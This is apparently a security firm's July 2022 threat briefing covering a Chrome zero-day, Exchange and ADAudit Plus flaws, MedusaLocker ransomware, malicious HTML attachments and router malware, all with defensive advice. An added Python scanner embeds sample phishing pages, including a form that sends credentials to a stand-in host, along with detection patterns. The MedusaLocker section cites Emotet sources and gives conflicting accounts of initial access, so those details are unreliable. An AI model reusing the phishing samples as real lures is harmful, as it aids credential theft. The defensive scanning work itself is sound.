Date: 7/5/2022
Google Chrome is affected by a zero-day vulnerability that is being exploited in the wild. The vulnerability is tracked as CVE-2022-2294 and relates to a heap overflow flaw in a component that provides real-time audio and video communication capabilities.
Heap buffer overflow vulnerabilities can lead to an attacker executing arbitrary code and potentially evading active security defenses. This vulnerability also impacts the Android version of Chrome.
Users should update Chrome to version 103.0.5060 for Windows, macOS, and Linux. To install Chrome updates, click the three dots in the upper right corner of Chrome, select Settings, and then click “About Chrome.” Android users should update to version 103.0.5060.71.
Newly discovered malware has been in the wild since March 2021 and is used to backdoor Internet-facing Microsoft Exchange servers. The malware disguises itself as a module for Internet Information Services (“IIS”) and has been deployed after exploiting the ProxyLogon flaws in Exchange. This malware has been dubbed SessionManager.
IIS modules used as backdoors allow malicious actors to maintain stealthy persistence and perform a wide range of actions, such as collecting emails or launching further attacks inside a victim’s network. Attackers have used this backdoor access to deploy reconnaissance and credential harvesting tools.
Organizations should primarily ensure that Internet-facing Microsoft Exchange servers are up to date. It is strongly recommended that these systems be protected by Endpoint Detection & Response (“EDR”) tools with strong monitoring capabilities. Administrators should also consider disabling public access to the Exchange Control Panel (“ECP”) and the Offline Address Book (“OAB”).
Sources
https://thehackernews.com/2022/07/new-sessionmanager-backdoor-targeting.html
https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/
Researchers have published technical details for CVE-2022-28219, a critical vulnerability in the Zoho ManageEngine ADAudit Plus tool for monitoring activity in Active Directory. The vulnerability allows unauthenticated remote code execution. However, unless ADAudit Plus services are exposed to the Internet, an attacker would first need access to the internal network to exploit it.
Exploitation permits attackers to execute arbitrary code, upload files, steal account credentials, and potentially leverage ADAudit Plus functionality to deploy malware on all Active Directory managed systems.
Ensure that ADAudit Plus instances are running build 7060. Administrators should also ensure access to ADAudit Plus is restricted and leverage separate service accounts with limited privileges.
The FBI, CISA, and FinCEN have issued joint advisories highlighting a recent increase in MedusaLocker ransomware attacks. These new attacks are attributed explicitly to access gained over Remote Desktop Protocol (RDP) into the victim network. Post-exploitation activities include the detonation of MedusaLocker and the creation of ransom notes pointing to various Bitcoin wallet addresses.
In most attacks, the initial compromise came via phishing emails that include RDP exploits. Secondary actions include using PowerShell scripts to propagate the ransomware throughout the network. The attackers also kill the primary processes of well-known security and forensic software to maintain persistence. The final step in the kill chain is mass encryption of files and folders using AES-256 and RSA-2048.
MedusaLocker has been an incredibly successful ransomware variant with a large victim footprint since 2019. Combining a sophisticated kill chain with well-established encryption standards, these attacks can have a massive impact on victim networks. Organizations should be on the lookout for these attacks and take appropriate action.
First and foremost, organizations should be using strong email security and Endpoint Detection and Response products. This significantly reduces the attack surface at MedusaLocker’s most common initial access point, phishing.
Additionally, organizations should have tested and up-to-date recovery plans if a ransomware attack is successful. This should include the ability to retain and restore sensitive or proprietary data through backups and copies of critical data.
Implementing network segmentation and maintaining offline backups of data are also advised.
Sources
https://thehackernews.com/2022/03/emotet-botnets-latest-resurgence.html
https://thehackernews.com/2022/02/reborn-of-emotet-new-features-of-botnet.html
Researchers at Barracuda Networks have published an alarming statistic that one in five HTML email attachments contain malicious logic.
This statistic was found after the Barracuda team analyzed millions of attachments that passed through Barracuda systems over a multi-month period. Each of these attachments was scanned and compared to similar attachments. Of these millions of attachments, 21% of all HTML attachments were found to be malicious.
Barracuda reported that attackers had embedded HTML attachments in emails disguised as weekly reports. This tricks users into clicking on phishing links.
The Barracuda team has observed attackers using these HTML attachments for multiple kinds of attack. The primary method is credential phishing: attackers include links to phishing sites within the HTML that, when opened, use JavaScript to redirect to a third-party machine and request credentials. Other attachments contain links that attempt to download malware directly onto user machines. Some attachments don’t forward users to fake websites at all; instead, the phishing form is embedded directly in the attachment, so the phishing page itself is delivered as the attachment rather than as a redirecting link.
Organizations can strengthen their security against malicious HTML attachments in a few ways. First, organizations should ensure that their deployed email security products are configured to scan and block malicious email attachments, especially HTML documents. Barracuda specifically recommends solutions that include machine learning and static code analysis to evaluate an email’s content, not just the attachment(s).
Secondly, training users to identify and report malicious attachments is essential. This can significantly reduce the chances of users falling victim to these phishing attacks.
Lastly, if an attack is successful, having robust Endpoint Detection and Response capabilities is key to protecting potentially compromised endpoints.
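As an added example in the spirit of the static code analysis recommended above (not code from Barracuda or from this briefing), the following Python scanner parses HTML attachments and flags the three behaviours described: script-driven redirects, forms that post to an external host, and password fields embedded in the attachment itself. The sample attachments, the `TRUSTED_HOSTS` allow-list and the finding strings are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachments for this demo; none is taken from the Barracuda report.
SAMPLES = {
    "weekly_report.html": """<html><body><h1>Weekly Report</h1>
<script>window.location.replace('https://login.example-phish.test/auth');</script></body></html>""",
    "invoice.html": """<html><body><p>Sign in to view your invoice</p>
<form action="https://collect.example-phish.test/post" method="post">
<input name="user"><input type="password" name="pass"><input type="submit"></form></body></html>""",
    "newsletter.html": """<html><body><p>This month's news</p>
<a href="https://www.example.com/news">Read more</a></body></html>""",
}

# Hosts the organisation's own mail may legitimately post forms to (assumed allow-list).
TRUSTED_HOSTS = {"www.example.com"}
# Client-side redirects: location = ..., location.href = ..., location.replace(...).
REDIRECT_RE = re.compile(r"(?:window\.|document\.)?location(?:\.href|\.replace|\.assign)?\s*[=(]", re.I)


class AttachmentScanner(HTMLParser):
    """Flags JavaScript redirects, forms posting off-host, and embedded password fields."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "form":
            host = urlparse(a.get("action", "")).hostname
            if host and host not in TRUSTED_HOSTS:
                self.findings.append(f"form posts to external host {host}")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password field embedded in attachment")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser passes <script> bodies to handle_data verbatim, so regex-check them here.
        if self._in_script and REDIRECT_RE.search(data):
            self.findings.append("script performs client-side redirect")


def scan_attachment(html):
    """Return the findings for one HTML attachment; an empty list means nothing was flagged."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Any non-empty result is a candidate for blocking or quarantine; a real gateway would add the machine-learning and content checks Barracuda describes on top of these static rules.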
Sources
https://blog.barracuda.com/2022/06/28/threat-spotlight-malicious-html-attachments/
Lumen Technologies’ Black Lotus Labs division has published a report about a router malware campaign.
The campaign targets “more than eighty SOHO router models, including ones from Asus, Cisco, DrayTek, and Netgear.”
Black Lotus Labs has observed the malware capturing network traffic, scanning home networks, and infecting hosts on victim networks with command-and-control tooling such as Cobalt Strike.
The sophistication level of the malware suggests that a nation-state threat actor might be behind the campaign.
The report did not include information about the attackers’ suspected end goals, but given the observed activity, the potential impact is broad. The campaign infects SOHO (Small-Office/Home-Office) routers, which are a willful blind spot for those managing corporate technology in the “Work From Anywhere” (WFA) environment most of us now find ourselves in. Understandably, these technology managers must draw a line around what they manage, and that demarcation point is often the management of users’ home networks. In the WFA environment, however, an infected home network can have the same impact as an infected corporate network, ranging from espionage to exfiltration to ransomware.
The most secure end of the WFA spectrum includes corporations supplying and managing Internet connections and networking equipment for all employees. Because employee home networks are largely outside the control of most corporate IT departments, a meticulous focus on IT asset configuration management and Endpoint Detection and Response (EDR) configuration is helpful in the WFA environment. Corporations using the WFA model should, at the very least, include language in policies requiring employees to keep home network equipment at the highest available patch level.
Sources
https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/?utm_source=referral&utm_medium=press+release
https://www.wired.com/story/zuorat-trojan-malware-hacking-routers/
For strategic clients, your vCISO will add this to your next Office Hours for further discussion. However, if you have an immediate need, concern, or question, please reach out to them directly.
For non-strategic clients, please reach out to your Advisor for further discussion.
For those not yet clients of GreyCastle Security, please click the “Contact Us” button below and we’ll be glad to provide assistance as well as answer any questions you might have.
Copyright © 2023 GreyCastle Security. All Rights Reserved